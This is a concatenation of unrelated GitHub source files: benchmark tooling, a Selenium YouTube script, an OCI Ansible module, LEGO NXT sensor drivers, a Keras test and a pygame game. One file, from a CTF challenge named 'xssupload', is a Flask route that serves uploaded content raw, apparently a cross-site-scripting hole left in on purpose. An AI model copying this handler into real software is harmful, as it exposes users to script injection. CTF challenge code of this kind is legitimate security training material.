default=[],\n help=\"filter benchmarks with regexp\")\n parser.add_argument(\n \"--filter-by-tier\",\n type=int,\n action=\"append\",\n default=[],\n help=\"filter benchmarks by predefined tier 1-3\",\n )\n parser.add_argument(\n \"--format\", default='csv', choices=['csv', 'png'], help='Output format')\n parser.add_argument(\n '--input-dirname', '-i', required=True, type=str, help='Input directory.')\n parser.add_argument(\n '--report',\n default='speedup',\n choices=['latest', 'histogram', 'speedup'],\n help='What report to generate.')\n parser.add_argument(\n '--test',\n default='inference',\n choices=['inference', 'training'],\n help='Test mode.')\n parser.add_argument('--title', type=str, help=\"Plot title.\")\n args = parser.parse_args(args)\n\n tiers.append_filter_by_tier(args.filter, args.filter_by_tier)\n tiers.append_filter_by_tier(args.exclude, args.exclude_by_tier)\n args.filter = args.filter or [r\".\"]\n args.exclude = args.exclude or [r\"^$\"]\n\n return args\n\n\ndef main():\n args = parse_args()\n filenames = find_files(args.input_dirname)\n results_map = {}\n\n # Some CSV files have lots of errors from execution; expand CSV's size limit.\n csv.field_size_limit(1024 * 1024)\n\n for filename in filenames:\n process_file(args, results_map, filename)\n process_results(args, results_map)\n if not 
results_map:\n sys.exit('no results found')\n pr_results(results_map, args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mrnikwaws/torch_xla","sub_path":"benchmarks/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"35919561286","text":"from flask import Blueprint, render_template, Response\nimport storage\n\nblueprint = Blueprint('getfiles', __name__)\n\n\n@blueprint.get(\"/file/\")\ndef get_file(file_id):\n value = storage.lookup_item(file_id)\n if value is None:\n return render_template(\"404.html\"), 404\n response = Response(value)\n return response\n","repo_name":"uhctf/uhctf2023","sub_path":"challenges/xssupload/webserver/getfiles.py","file_name":"getfiles.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"8622592676","text":"\r\n\r\nimport time\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\ndriver = webdriver.Chrome()\r\n\r\ndriver.maximize_window() #maximize the window\r\ndriver.get(\"https://www.youtube.com/\") #YouTube link\r\ntime.sleep(5)\r\ndriver.find_element(By.NAME, \"search_query\").send_keys(\"Yaro Yaro\") #Song name which you need to mention\r\ndriver.find_element(By.ID, \"search-icon-legacy\").click() #By clicking on search it will direct you to the song name you mentioned\r\ntime.sleep(5)\r\ndriver.find_element(By.CLASS_NAME, \"style-scope ytd-video-renderer\").click() #As you mentioned the song name this will click the first song which is coming infront row\r\nwait = WebDriverWait(driver,10)\r\nwhile True:\r\n try:\r\n for i in range(3):\r\n wait.until(EC.presence_of_element_located((By.CLASS_NAME,\"ytp\")))\r\n break\r\n except:\r\n pass\r\n","repo_name":"RathishRavindran/SeleniumSnippet","sub_path":"Youtube.py","file_name":"Youtube.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42514768719","text":"from __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"preview\"],\n \"supported_by\": \"community\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: oci_data_flow_statement\nshort_description: Manage a Statement resource in Oracle Cloud Infrastructure\ndescription:\n - This module allows the user to create and delete a Statement resource in Oracle Cloud Infrastructure\n - For I(state=present), executes a statement for a Session run.\nversion_added: \"2.9.0\"\nauthor: Oracle (@oracle)\noptions:\n code:\n description:\n - \"The statement code to execute.\n Example: `println(sc.version)`\"\n - Required for create using I(state=present).\n type: str\n run_id:\n description:\n - The unique ID for the run\n type: str\n required: true\n statement_id:\n description:\n - The unique ID for the statement.\n - Required for delete using I(state=absent).\n type: str\n aliases: [\"id\"]\n state:\n description:\n - The state of the Statement.\n - Use I(state=present) to create a Statement.\n - Use I(state=absent) to delete a Statement.\n type: str\n required: false\n default: 'present'\n choices: [\"present\", \"absent\"]\nextends_documentation_fragment: [ 
oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: Create statement\n oci_data_flow_statement:\n # required\n code: code_example\n run_id: \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\"\n\n- name: Delete statement\n oci_data_flow_statement:\n # required\n run_id: \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\"\n statement_id: \"ocid1.statement.oc1..xxxxxxEXAMPLExxxxxx\"\n state: absent\n\n\"\"\"\n\nRETURN = \"\"\"\nstatement:\n description:\n - Details of the Statement resource acted upon by the current operation\n returned: on success\n type: complex\n contains:\n id:\n description:\n - The statement ID.\n returned: on success\n type: int\n sample: 56\n code:\n description:\n - \"The statement code to execute.\n Example: `println(sc.version)`\"\n returned: on success\n type: str\n sample: code_example\n lifecycle_state:\n description:\n - The current state of this statement.\n returned: on success\n type: str\n sample: ACCEPTED\n output:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n data:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n type:\n description:\n - The type of the `StatementOutputData` like `TEXT_PLAIN`, `TEXT_HTML` or `IMAGE_PNG`.\n returned: on success\n type: str\n sample: TEXT_PLAIN\n value:\n description:\n - The statement code execution output in png format.\n returned: on success\n type: str\n sample: \"null\"\n\n status:\n description:\n - Status of the statement output.\n returned: on success\n type: str\n sample: OK\n error_name:\n description:\n - The name of the error in the statement output.\n returned: on success\n type: str\n sample: error_name_example\n error_value:\n description:\n - The value of the error in the statement output.\n returned: on success\n type: str\n sample: error_value_example\n traceback:\n description:\n - The traceback of the statement output.\n returned: on success\n type: list\n sample: []\n progress:\n description:\n - The execution progress.\n returned: on success\n type: float\n sample: 1.2\n run_id:\n description:\n - The ID of a run.\n returned: on success\n type: str\n sample: \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\"\n time_created:\n description:\n - \"The date and time the resource was created, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format.\n Example: `2018-04-03T21:10:29.600Z`\"\n returned: on success\n type: str\n sample: \"2013-10-20T19:20:30+01:00\"\n time_completed:\n description:\n - \"The date and time a statement execution was completed, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format.\n Example: `2022-05-31T21:10:29.600Z`\"\n returned: on success\n type: str\n sample: \"2013-10-20T19:20:30+01:00\"\n sample: {\n \"id\": 56,\n \"code\": \"code_example\",\n \"lifecycle_state\": \"ACCEPTED\",\n \"output\": {\n \"data\": {\n \"type\": \"TEXT_PLAIN\",\n \"value\": null\n },\n \"status\": \"OK\",\n \"error_name\": \"error_name_example\",\n \"error_value\": \"error_value_example\",\n \"traceback\": []\n },\n \"progress\": 1.2,\n \"run_id\": \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\",\n \"time_created\": \"2013-10-20T19:20:30+01:00\",\n \"time_completed\": \"2013-10-20T19:20:30+01:00\"\n }\n\"\"\"\n\nfrom ansible_collections.oracle.oci.plugins.module_utils import (\n oci_common_utils,\n oci_wait_utils,\n)\nfrom ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (\n OCIResourceHelperBase,\n get_custom_class,\n 
OCIAnsibleModule,\n)\n\ntry:\n from oci.data_flow import DataFlowClient\n from oci.data_flow.models import CreateStatementDetails\n\n HAS_OCI_PY_SDK = True\nexcept ImportError:\n HAS_OCI_PY_SDK = False\n\n\nclass DataFlowStatementHelperGen(OCIResourceHelperBase):\n \"\"\"Supported operations: create, get, list and delete\"\"\"\n\n def get_possible_entity_types(self):\n return super(DataFlowStatementHelperGen, self).get_possible_entity_types() + [\n \"dataflowrun\",\n \"dataflowruns\",\n \"dataFlowdataflowrun\",\n \"dataFlowdataflowruns\",\n \"dataflowrunresource\",\n \"dataflowrunsresource\",\n \"statement\",\n \"statements\",\n \"dataFlowstatement\",\n \"dataFlowstatements\",\n \"statementresource\",\n \"statementsresource\",\n \"dataflow\",\n ]\n\n def get_module_resource_id_param(self):\n return \"statement_id\"\n\n def get_module_resource_id(self):\n return self.module.params.get(\"statement_id\")\n\n def get_get_fn(self):\n return self.client.get_statement\n\n def get_get_model_from_summary_model(self, summary_model):\n return oci_common_utils.call_with_backoff(\n self.client.get_statement,\n statement_id=summary_model.id,\n run_id=self.module.params.get(\"run_id\"),\n ).data\n\n def get_resource(self):\n return oci_common_utils.call_with_backoff(\n self.client.get_statement,\n run_id=self.module.params.get(\"run_id\"),\n statement_id=self.module.params.get(\"statement_id\"),\n )\n\n def get_required_kwargs_for_list(self):\n required_list_method_params = [\n \"run_id\",\n ]\n\n return dict(\n (param, self.module.params[param]) for param in required_list_method_params\n )\n\n def get_optional_kwargs_for_list(self):\n return dict()\n\n def list_resources(self):\n\n required_kwargs = self.get_required_kwargs_for_list()\n optional_kwargs = self.get_optional_kwargs_for_list()\n kwargs = oci_common_utils.merge_dicts(required_kwargs, optional_kwargs)\n return oci_common_utils.list_all_resources(\n self.client.list_statements, **kwargs\n )\n\n def get_create_model_class(self):\n return CreateStatementDetails\n\n def create_resource(self):\n create_details = self.get_create_model()\n return oci_wait_utils.call_and_wait(\n call_fn=self.client.create_statement,\n call_fn_args=(),\n call_fn_kwargs=dict(\n create_statement_details=create_details,\n run_id=self.module.params.get(\"run_id\"),\n ),\n waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,\n operation=oci_common_utils.CREATE_OPERATION_KEY,\n waiter_client=self.get_waiter_client(),\n resource_helper=self,\n wait_for_states=self.get_wait_for_states_for_operation(\n oci_common_utils.CREATE_OPERATION_KEY,\n ),\n )\n\n def delete_resource(self):\n return oci_wait_utils.call_and_wait(\n call_fn=self.client.delete_statement,\n call_fn_args=(),\n call_fn_kwargs=dict(\n run_id=self.module.params.get(\"run_id\"),\n statement_id=self.module.params.get(\"statement_id\"),\n ),\n waiter_type=oci_wait_utils.NONE_WAITER_KEY,\n operation=oci_common_utils.DELETE_OPERATION_KEY,\n waiter_client=self.get_waiter_client(),\n resource_helper=self,\n wait_for_states=self.get_wait_for_states_for_operation(\n oci_common_utils.DELETE_OPERATION_KEY,\n ),\n )\n\n\nDataFlowStatementHelperCustom = get_custom_class(\"DataFlowStatementHelperCustom\")\n\n\nclass ResourceHelper(DataFlowStatementHelperCustom, DataFlowStatementHelperGen):\n pass\n\n\ndef main():\n module_args = oci_common_utils.get_common_arg_spec(\n supports_create=True, supports_wait=True\n )\n module_args.update(\n dict(\n code=dict(type=\"str\"),\n run_id=dict(type=\"str\", required=True),\n 
statement_id=dict(aliases=[\"id\"], type=\"str\"),\n state=dict(type=\"str\", default=\"present\", choices=[\"present\", \"absent\"]),\n )\n )\n\n module = OCIAnsibleModule(argument_spec=module_args, supports_check_mode=True)\n\n if not HAS_OCI_PY_SDK:\n module.fail_json(msg=\"oci python sdk required for this module.\")\n\n resource_helper = ResourceHelper(\n module=module,\n resource_type=\"statement\",\n service_client_class=DataFlowClient,\n namespace=\"data_flow\",\n )\n\n result = dict(changed=False)\n\n if resource_helper.is_delete():\n result = resource_helper.delete()\n elif resource_helper.is_create():\n result = resource_helper.create()\n\n module.exit_json(**result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oracle/oci-ansible-collection","sub_path":"plugins/modules/oci_data_flow_statement.py","file_name":"oci_data_flow_statement.py","file_ext":"py","file_size_in_byte":11377,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"78"} +{"seq_id":"38823300686","text":"from .common import *\nfrom .digital import BaseDigitalSensor\nfrom .analog import BaseAnalogSensor\n\n\nclass Compass(BaseDigitalSensor):\n \"\"\"Hitechnic compass sensor.\"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({'mode': (0x41, 'B'),\n 'heading': (0x42, 'B'),\n 'adder' : (0x43, 'B'),\n })\n \n class Modes:\n MEASUREMENT = 0x00\n CALIBRATION = 0x43\n CALIBRATION_FAILED = 0x02\n \n def get_heading(self):\n \"\"\"Returns heading from North in degrees.\"\"\"\n\n two_degree_heading = self.read_value('heading')[0]\n adder = self.read_value('adder')[0]\n heading = two_degree_heading * 2 + adder\n\n return heading\n \n get_sample = get_heading\n\n def get_relative_heading(self,target=0):\n rheading = self.get_sample()-target\n if rheading > 180:\n rheading -= 360\n elif rheading < -180:\n rheading += 360\n return rheading\t\n \n def is_in_range(self,minval,maxval):\n \"\"\"This deserves a little explanation:\nif max > min, it's straightforward, but\nif min > max, it switches the values of max and min\nand returns true if heading is NOT between the new max and min\n \"\"\"\n if minval > maxval:\n (maxval,minval) = (minval,maxval)\n inverted = True\n else:\n inverted = False\n heading = self.get_sample()\n in_range = (heading > minval) and (heading < maxval)\n #an xor handles the reversal\n #a faster, more compact way of saying\n #if !reversed return in_range\n #if reversed return !in_range\n return bool(inverted) ^ bool(in_range) \n\n def get_mode(self):\n return self.read_value('mode')[0]\n \n def set_mode(self, mode):\n if mode != self.Modes.MEASUREMENT and \\\n mode != self.Modes.CALIBRATION:\n raise ValueError('Invalid mode specified: ' + str(mode))\n self.write_value('mode', (mode, ))\n \nCompass.add_compatible_sensor(None, 'HiTechnc', 'Compass ') #Tested with version '\\xfdV1.23 '\nCompass.add_compatible_sensor(None, 'HITECHNC', 'Compass ') #Tested with version '\\xfdV2.1 '\n\n\nclass Accelerometer(BaseDigitalSensor):\n 'Object for Accelerometer sensors. 
Thanks to Paulo Vieira.'\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({'x_axis_high': (0x42, 'b'),\n 'y_axis_high': (0x43, 'b'),\n 'z_axis_high': (0x44, 'b'),\n 'xyz_short': (0x42, '3b'),\n 'all_data': (0x42, '3b3B')\n })\n \n class Acceleration:\n def __init__(self, x, y, z):\n self.x, self.y, self.z = x, y, z\n \n def __init__(self, brick, port, check_compatible=True):\n super(Accelerometer, self).__init__(brick, port, check_compatible)\n\n def get_acceleration(self):\n \"\"\"Returns the acceleration along x, y, z axes. Units are unknown to me.\n \"\"\"\n xh, yh, zh, xl, yl, zl = self.read_value('all_data')\n x = xh << 2 + xl\n y = yh << 2 + yl\n z = zh << 2 + yl\n return self.Acceleration(x, y, z)\n \n get_sample = get_acceleration\n\nAccelerometer.add_compatible_sensor(None, 'HiTechnc', 'Accel. ')\nAccelerometer.add_compatible_sensor(None, 'HITECHNC', 'Accel. ') #Tested with version '\\xfdV1.1 '\n\n\nclass IRReceiver(BaseDigitalSensor):\n \"\"\"Object for HiTechnic IRReceiver sensors for use with LEGO Power Functions IR\nRemotes. Coded to HiTechnic's specs for the sensor but not tested. Please report\nwhether this worked for you or not!\n \"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({\n 'm1A': (0x42, 'b'),\n 'm1B': (0x43, 'b'),\n 'm2A': (0x44, 'b'),\n 'm2B': (0x45, 'b'),\n 'm3A': (0x46, 'b'),\n 'm3B': (0x47, 'b'),\n 'm4A': (0x48, 'b'),\n 'm4B': (0x49, 'b'),\n 'all_data': (0x42, '8b')\n })\n\n class SpeedReading:\n def __init__(self, m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B):\n self.m1A, self.m1B, self.m2A, self.m2B, self.m3A, self.m3B, self.m4A, self.m4B = m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B\n self.channel_1 = (m1A, m1B)\n self.channel_2 = (m2A, m2B)\n self.channel_3 = (m3A, m3B)\n self.channel_4 = (m4A, m4B)\n \n def __init__(self, brick, port, check_compatible=True):\n super(IRReceiver, self).__init__(brick, port, check_compatible)\n\n def get_speeds(self):\n \"\"\"Returns the motor speeds for motors A and B on channels 1-4.\nValues are -128, -100, -86, -72, -58, -44, -30, -16, 0, 16, 30, 44, 58, 72, 86\nand 100. -128 specifies motor brake mode. Note that no motors are actually\nbeing controlled here!\n \"\"\"\n m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B = self.read_value('all_data')\n return self.SpeedReading(m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B)\n \n get_sample = get_speeds\n\nIRReceiver.add_compatible_sensor(None, 'HiTechnc', 'IRRecv ')\nIRReceiver.add_compatible_sensor(None, 'HITECHNC', 'IRRecv ')\n\n\nclass IRSeekerv2(BaseDigitalSensor):\n \"\"\"Object for HiTechnic IRSeeker sensors. Coded to HiTechnic's specs for the sensor\nbut not tested. 
Please report whether this worked for you or not!\n \"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({\n 'dspmode': (0x41, 'B'),\n 'DC_direction': (0x42, 'B'),\n 'DC_sensor_1': (0x43, 'B'),\n 'DC_sensor_2': (0x44, 'B'),\n 'DC_sensor_3': (0x45, 'B'),\n 'DC_sensor_4': (0x46, 'B'),\n 'DC_sensor_5': (0x47, 'B'),\n 'DC_sensor_mean': (0x48, 'B'),\n 'all_DC': (0x42, '7B'),\n 'AC_direction': (0x49, 'B'),\n 'AC_sensor_1': (0x4A, 'B'),\n 'AC_sensor_2': (0x4B, 'B'),\n 'AC_sensor_3': (0x4C, 'B'),\n 'AC_sensor_4': (0x4D, 'B'),\n 'AC_sensor_5': (0x4E, 'B'),\n 'all_AC': (0x49, '6B')\n })\n I2C_DEV = 0x10 #different from standard 0x02\n \n class DSPModes:\n #Modes for modulated (AC) data.\n AC_DSP_1200Hz = 0x00\n AC_DSP_600Hz = 0x01\n \n class _data:\n def get_dir_brightness(self, direction):\n \"Gets the brightness of a given direction (1-9).\"\n if direction%2 == 1: #if it's an odd number\n exec(\"val = self.sensor_%d\" % ((direction-1)/2+1))\n else:\n exec(\"val = (self.sensor_%d+self.sensor_%d)/2\" % (direction/2, (direction/2)+1))\n return val\n \n class DCData(_data):\n def __init__(self, direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean):\n self.direction, self.sensor_1, self.sensor_2, self.sensor_3, self.sensor_4, self.sensor_5, self.sensor_mean = direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean\n \n class ACData(_data):\n def __init__(self, direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5):\n self.direction, self.sensor_1, self.sensor_2, self.sensor_3, self.sensor_4, self.sensor_5 = direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5\n \n \n def __init__(self, brick, port, check_compatible=True):\n super(IRSeekerv2, self).__init__(brick, port, check_compatible)\n\n def get_dc_values(self):\n \"\"\"Returns the unmodulated (DC) values.\n \"\"\"\n direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean = self.read_value('all_DC')\n return self.DCData(direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean)\n \n def get_ac_values(self):\n \"\"\"Returns the modulated (AC) values. 600Hz and 1200Hz modes can be selected\nbetween by using the set_dsp_mode() function.\n \"\"\"\n direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5 = self.read_value('all_AC')\n return self.ACData(direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5)\n \n def get_dsp_mode(self):\n return self.read_value('dspmode')[0]\n \n def set_dsp_mode(self, mode):\n self.write_value('dspmode', (mode, ))\n \n get_sample = get_ac_values\n\nIRSeekerv2.add_compatible_sensor(None, 'HiTechnc', 'NewIRDir')\nIRSeekerv2.add_compatible_sensor(None, 'HITECHNC', 'NewIRDir')\n\n\nclass EOPD(BaseAnalogSensor):\n \"\"\"Object for HiTechnic Electro-Optical Proximity Detection sensors.\n \"\"\"\n \n # To be divided by processed value.\n _SCALE_CONSTANT = 250\n\n # Maximum distance the sensor can detect.\n _MAX_DISTANCE = 1023\n\n def __init__(self, brick, port):\n super(EOPD, self).__init__(brick, port)\n from math import sqrt\n self.sqrt = sqrt\n\n def set_range_long(self):\n ''' Choose this mode to increase the sensitivity\n of the EOPD sensor by approximately 4x. 
May\n cause sensor overload.\n '''\n\n self.set_input_mode(Type.LIGHT_ACTIVE, Mode.RAW)\n\n def set_range_short(self):\n ''' Choose this mode to prevent the EOPD sensor from\n being overloaded by white objects.\n '''\n\n self.set_input_mode(Type.LIGHT_INACTIVE, Mode.RAW)\n \n def get_raw_value(self):\n '''Unscaled value read from sensor.'''\n\n return self._MAX_DISTANCE - self.get_input_values().raw_ad_value\n \n def get_processed_value(self):\n '''Derived from the square root of the raw value.'''\n\n return self.sqrt(self.get_raw_value())\n\n def get_scaled_value(self):\n ''' Returns a value that will scale linearly as distance\n from target changes. This is the method that should\n generally be called to get EOPD sensor data.\n '''\n\n try:\n result = self._SCALE_CONSTANT / self.get_processed_value()\n return result\n\n except ZeroDivisionError:\n return self._SCALE_CONSTANT\n \n get_sample = get_scaled_value\n\n\nclass Colorv2(BaseDigitalSensor):\n \"\"\"Object for HiTechnic Color v2 Sensors. Coded to HiTechnic's specs for the sensor\nbut not tested. Please report whether this worked for you or not!\"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({\n 'mode': (0x41, 'B'),\n 'number': (0x42, 'B'),\n 'red': (0x43, 'B'),\n 'green': (0x44, 'B'),\n 'blue': (0x45, 'B'),\n 'white': (0x46, 'B'),\n 'index': (0x47, 'B'),\n 'normred': (0x48, 'B'),\n 'normgreen': (0x49, 'B'),\n 'normblue': (0x4A, 'B'),\n 'all_data': (0x42, '9B'),\n 'rawred': (0x42, 'l'),\n 'm1mode': (0x44, 'B'),\n 'm1power': (0x45, 'b'),\n 'm2power': (0x46, 'b'),\n 'm2mode': (0x47, 'B'),\n 'm2enctarget': (0x48, '>l'),\n 'm1enccurrent': (0x4c, '>l'),\n 'm2enccurrent': (0x50, '>l'),\n 'batteryvoltage': (0x54, '2B'),\n 'm1gearratio': (0x56, 'b'),\n 'm1pid': (0x57, '3B'),\n 'm2gearratio': (0x5a, 'b'),\n 'm2pid': (0x5b, '3B'),\n })\n \n class PID_Data():\n def __init__(self, p, i, d):\n self.p, self.i, self.d = p, i, d\n \n def __init__(self, brick, port, check_compatible=True):\n super(MotorCon, self).__init__(brick, port, check_compatible)\n \n def set_enc_target(self, mot, val):\n \"\"\"Set the encoder target (-2147483648-2147483647) for a motor\n \"\"\"\n self.write_value('m%denctarget'%mot, (val, ))\n \n def get_enc_target(self, mot):\n \"\"\"Get the encoder target for a motor\n \"\"\"\n return self.read_value('m%denctarget'%mot)[0]\n \n def get_enc_current(self, mot):\n \"\"\"Get the current encoder value for a motor\n \"\"\"\n return self.read_value('m%denccurrent'%mot)[0]\n \n def set_mode(self, mot, mode):\n \"\"\"Set the mode for a motor. This value is a bit mask and you can\nfind details about it in the sensor's documentation.\n \"\"\"\n self.write_value('m%dmode'%mot, (mode, ))\n \n def get_mode(self, mot):\n \"\"\"Get the mode for a motor. This value is a bit mask and you can\nfind details about it in the sensor's documentation.\n \"\"\"\n return self.read_value('m%dmode'%mot)[0]\n \n def set_power(self, mot, power):\n \"\"\"Set the power (-100-100) for a motor\n \"\"\"\n self.write_value('m%dpower'%mot, (power, ))\n \n def get_power(self, mot):\n \"\"\"Get the power for a motor\n \"\"\"\n return self.read_value('m%dpower'%mot)[0]\n \n def set_gear_ratio(self, mot, ratio):\n \"\"\"Set the gear ratio for a motor\n \"\"\"\n self.write_value('m%dgearratio'%mot, (ratio, ))\n \n def get_gear_ratio(self, mot):\n \"\"\"Get the gear ratio for a motor\n \"\"\"\n return self.read_value('m%dgearratio'%mot)[0]\n \n def set_pid(self, mot, piddata):\n \"\"\"Set the PID coefficients for a motor. 
Takes data in\nMotorCon.PID_Data(p, i, d) format.\n \"\"\"\n self.write_value('m%dpid'%mot, (piddata.p, piddata.i, piddata.d))\n \n def get_pid(self, mot):\n \"\"\"Get the PID coefficients for a motor. Returns a PID_Data() object.\n \"\"\"\n p, i, d = self.read_value('m%dpid'%mot)\n return self.PID_Data(p, i, d)\n \n def get_battery_voltage(self):\n \"\"\"Gets the battery voltage (in millivolts/20)\n \"\"\"\n high, low = self.read_value('bateryvoltage')[0]\n return high << 2 + low\n\nMotorCon.add_compatible_sensor(None, 'HiTechnc', 'MotorCon')\n","repo_name":"Bobeye/LinkMechanismStewartGouph","sub_path":"OFWTP/nxt/sensor/hitechnic.py","file_name":"hitechnic.py","file_ext":"py","file_size_in_byte":21178,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"11640385311","text":"import tensorflow as tf\nfrom keras import keras_parameterized, testing_utils\nfrom tfreplknet.block import Block\n\n\n@keras_parameterized.run_all_keras_modes\nclass TestBlock(keras_parameterized.TestCase):\n def test_layer(self):\n testing_utils.layer_test(\n Block,\n kwargs={'kernel_size': 13, 'small_kernel': 5, 'ratio': 1., 'dropout': 0.},\n input_shape=[2, 64, 64, 3],\n input_dtype='float32',\n expected_output_shape=[None, 64, 64, 3],\n expected_output_dtype='float32'\n )\n testing_utils.layer_test(\n Block,\n kwargs={'kernel_size': 31, 'small_kernel': None, 'ratio': 1.5, 'dropout': .2},\n input_shape=[2, 64, 64, 3],\n input_dtype='float32',\n expected_output_shape=[None, 64, 64, 3],\n expected_output_dtype='float32'\n )\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"shkarupa-alex/tfreplknet","sub_path":"tfreplknet/tests/test_block.py","file_name":"test_block.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"21189839448","text":"\nimport pygame as pg\nimport random as rd\nfrom settings import *\nfrom myutility import GameSprite, AnimateSprite\n\nclass Player(pg.sprite.Sprite):\n\t\"\"\"Player model of game.\"\"\"\n\tdef __init__(self, game):\n\t\tsuper().__init__()\n\t\tself.game = game\n\t\tself.run = GameSprite(PLAYER[\"normal\"])\n\t\tself.fly = AnimateSprite(PLAYER[\"fly\"])\n\t\t\n\t\tself.run.scale(PLAYER_SIZE)\n\t\tself.fly.scale((PLAYER_SIZE[0] + 80, PLAYER_SIZE[1] + 80), 2)\n\t\tself.fly.scale((PLAYER_SIZE[0] + 20, PLAYER_SIZE[1] + 20), 1, 3)\n\t\tself.fly.scale(PLAYER_SIZE, 0, 4)\n\t\tself.fly.setRandomTimes(FLY_TIMES)\n\t\t\n\t\tself.image = self.run.image\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = WIDTH / 2, HEIGHT - 200\n\t\t\n\t\tself.inside_rect = self.rect.copy()\n\t\tself.inside_rect.width = self.inside_rect.width / 3 + 6\n\t\tself.inside_rect.height -= 60\n\t\tself.inside_rect.center = self.rect.center\n\t\t\n\t\tself.vx = PLAYER_VEL\n\t\tself.pos = float(self.rect.centerx)\n\t\tself.moving_left = False\n\t\tself.moving_right = False\n\t\tself.bl_fly = False\n\t\tself.crashed = False\n\t\tself.car_passed = 1\n\t\t\n\tdef getRectAndCenter(self):\n\t\tcenter = self.rect.center\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = center\n\t\n\tdef update(self, dt):\n\t\tif self.moving_left and self.inside_rect.left >= self.game.road.rect.left + 30:\n\t\t\tself.pos -= self.vx * dt * PIXEL_PER_SECOND\n\t\tif self.moving_right and self.inside_rect.right <= self.game.road.rect.right - 30:\n\t\t\tself.pos += self.vx * dt * PIXEL_PER_SECOND\n\t\t\n\t\tself.rect.centerx = 
self.pos\n\t\tself.inside_rect.centerx = self.rect.centerx\n\t\t\n\t\tif self.bl_fly:\n\t\t\tif self.fly.randomTimeAnimate(dt*1000) != 0:\n\t\t\t\tself.image = self.fly.image\n\t\t\t\tself.getRectAndCenter()\n\t\t\telse:\n\t\t\t\tself.bl_fly = False\n\t\t\t\tself.image = self.run.image\n\t\t\t\tself.getRectAndCenter()\n\t\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.image, self.rect)\n\t\t\n\t\t\nclass FlyStats:\n\tdef __init__(self, road):\n\t\tself.button = GameSprite(IMG_DIR + \"up-chevron.png\")\n\t\tself.button.rect.center = road.rect.right + 40, 1000\n\t\t\n\t\tself.fly_bar = pg.Rect(0, 0, FLY_BLOCK_WIDTH, FLY_BLOCK_WIDTH * MAX_FLY)\n\t\tself.fly_current = pg.Rect(0, 0, FLY_BLOCK_WIDTH, FLY_BLOCK_WIDTH)\n\t\t\n\t\tself.fly_current.centerx = self.fly_bar.centerx = self.button.rect.centerx\n\t\tself.fly_current.bottom = self.fly_bar.bottom = self.button.rect.top + 12\n\t\t\n\t\tself.fly_current.h = FLY_BLOCK_WIDTH\n\t\tself.progress = [False] * 5\n\t\tself.count = 1\n\t\tself.max = False\n\t\t\n\tdef update(self):\n\t\tif not False in self.progress and not self.max:\n\t\t\tself.progress = [False] * 5\n\t\t\tself.count += 1\n\t\tif self.count == MAX_FLY:\n\t\t\tself.max = True\n\t\telse:\n\t\t\tself.max = False\n\t\t\n\t\tself.fly_current.h = FLY_BLOCK_WIDTH * self.count\n\t\tself.fly_current.bottom = self.button.rect.top + 12\n\t\t\n\tdef draw(self, surf):\n\t\tpg.draw.rect(surf, BLUE, self.fly_current, 0)\n\t\tpg.draw.rect(surf, BLACK, self.fly_bar, 4)\n\t\tsurf.blit(self.button.image, self.button.rect)\n\t\tif self.progress[1]:\n\t\t\tpg.draw.circle(surf, RED, self.button.rect.center, 60, 18, *self.progress[:-1])\n\t\n\t\nclass Car(GameSprite):\n\t\"\"\"Random car used to draw 